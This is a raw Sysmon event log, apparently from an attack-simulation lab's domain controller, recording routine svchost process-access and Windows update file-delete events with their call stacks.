AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF2eac3.TMPMD5=C2907C7C1C65DEE0AE964F942A027D55,SHA256=383DD56C106F4754A41AD09067AFF9E42EF2962F15366D0D14827C10D2E899B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.105{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.105{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.105{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000008923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF2ea75.TMPMD5=FBCB1DF6FFB9E2ED1FB688AE88CDA060,SHA256=3D5901DF537C74DA245F92C38E8C6E5CF095CA32ACD9289D1AE0B835F4FC1726,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.059{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.059{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.012{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+210d2|c:\windows\system32\usocore.dll+15924|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x80000000000000008955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.455{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT 